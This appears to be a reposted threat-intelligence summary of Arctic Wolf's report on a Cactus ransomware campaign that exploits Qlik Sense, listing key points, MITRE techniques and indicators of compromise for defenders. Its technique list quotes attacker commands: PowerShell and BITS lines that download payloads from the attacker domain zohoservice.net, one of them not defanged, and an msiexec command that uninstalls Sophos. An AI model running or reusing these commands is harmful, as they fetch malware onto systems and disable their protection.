Threat Research

Qlik Sense Exploited in Cactus Ransomware Campaign – Arctic Wolf

Securonix

Arctic Wolf Labs reports a new Cactus ransomware campaign that exploits public Qlik Sense installations to gain initial access, followed by deployment of the ransomware. The operation leverages Qlik Sense Scheduler to drop remote-access tools (ManageEngine UEMS, AnyDesk, Plink), uses PowerShell and BITS for payload delivery, and includes RDP, WizTree, and rclone for lateral movement, discovery, and exfiltration. Hashtags: #QlikSense #CactusRansomware #ArcticWolf #QlikSenseScheduler #ManageEngineUEMS #AnyDesk #PuTTY #Plink #zohoservice.net

Keypoints

  • Exploitation of Qlik Sense installations to gain initial access and deploy Cactus ransomware.
  • Exploited CVEs CVE-2023-41266, CVE-2023-41265, or potentially CVE-2023-48365 to achieve code execution.
  • The Scheduler service (Scheduler.exe) is central to the intrusion, spawning uncommon processes and enabling further actions.
  • PowerShell and the Background Intelligent Transfer Service (BITS) are used to download tools and establish persistence/remote control.
  • Tools downloaded/used include ManageEngine UEMS (renamed), AnyDesk, and PuTTY Link (Plink).
  • Remote access and lateral movement involve RDP, SSH tunnels via Plink, and related credential/configuration steps.
  • Discovery and exfiltration steps involve WizTree for disk insight and rclone for data exfiltration.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The threat actors exploited Qlik Sense installations to achieve code execution. “Based on patch level Qlik Sense is likely being exploited either via the combination or direct abuse of CVE-2023-41266, CVE-2023-41265 or potentially CVE-2023-48365 to achieve code execution.”
  • [T1059.001] PowerShell – The intrusion uses PowerShell to download and execute payloads, e.g., “powershell iwr -uri http://zohoservice[.]net/putty.zip -OutFile c:windowstempputty.exe” and related commands.
  • [T1197] BITS Jobs – The attackers leveraged Background Intelligent Transfer Service (BITS) to download additional tools, e.g., “powershell start-bitstransfer -source http://zohoservice.net/qlik-sens-nov.zip -outfile c:windowstempQliksens.exe”
  • [T1036] Masquerading – Renamed ManageEngine UEMS executables, with a ZIP extension masquerading as Qlik files.
  • [T1218.009] Signed Binary Proxy Execution – Msiexec – “MsiExec.exe /X{…} /qn” used to uninstall Sophos as part of the activity.
  • [T1021.001] Remote Services – RDP – Used for lateral movement within networks.
  • [T1021.004] Remote Services – SSH – Plink was used to establish an SSH tunnel for remote access.
  • [T1219] Remote Access Software – AnyDesk was downloaded and used for remote control.
  • [T1083] File and Directory Discovery – WizTree was downloaded to assess disk space and files for discovery.
  • [T1041] Exfiltration Over C2 Channel – rclone was used (renamed as svchost.exe) to exfiltrate data.

Indicators of Compromise

  • [IOC Type] IP Address – 45.61.147[.]176 (ManageEngine Server / IP for zohoservice[.]net); 216.107.136[.]46 (ManageEngine Server hosting payload over HTTP); 144.172.122[.]30 (ManageEngine Server hosting payload over HTTP)
  • [IOC Type] Domain Name – zohoservice[.]net (Hosting payload over HTTP)
  • [IOC Type] URL – http://zohoservice[.]net/putty.zip; http://216.107.136[.]46/Qliksens_update.zip; http://216.107.136[.]46/Qliksens_updated.zip; http://zohoservice[.]net/qlik-sens-Patch.zip; http://zohoservice[.]net/qlik-sens-nov.zip
  • [IOC Type] File path – C:UsersPublicsvchost.exe; c:windowstempQliksens.exe; c:windowstempany.exe; C:WindowsappcompatAcRes.exe
  • [IOC Type] Filename – Qliksens.exe; Qliksens_updated.zip; Qliksens_update.zip; Qlik_sense_enterprise.zip; anydesk.zip; putty.exe
  • [IOC Type] SHA256 – 828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d; 90b009b15eb1b5bc4a990ecdd86375fa25eaa67a8515ae6c6b3b58815d46fa82; 3ac8308a7378dfe047eacd393c861d32df34bb47535972eb0a35631ab964d14d; 6cb87cad36f56aefcefbe754605c00ac92e640857fd7ca5faab7b9542ef80c96
  • [IOC Type] URL – https://download.anydesk.com/AnyDesk.exe (Official AnyDesk Installer)

Read more: https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint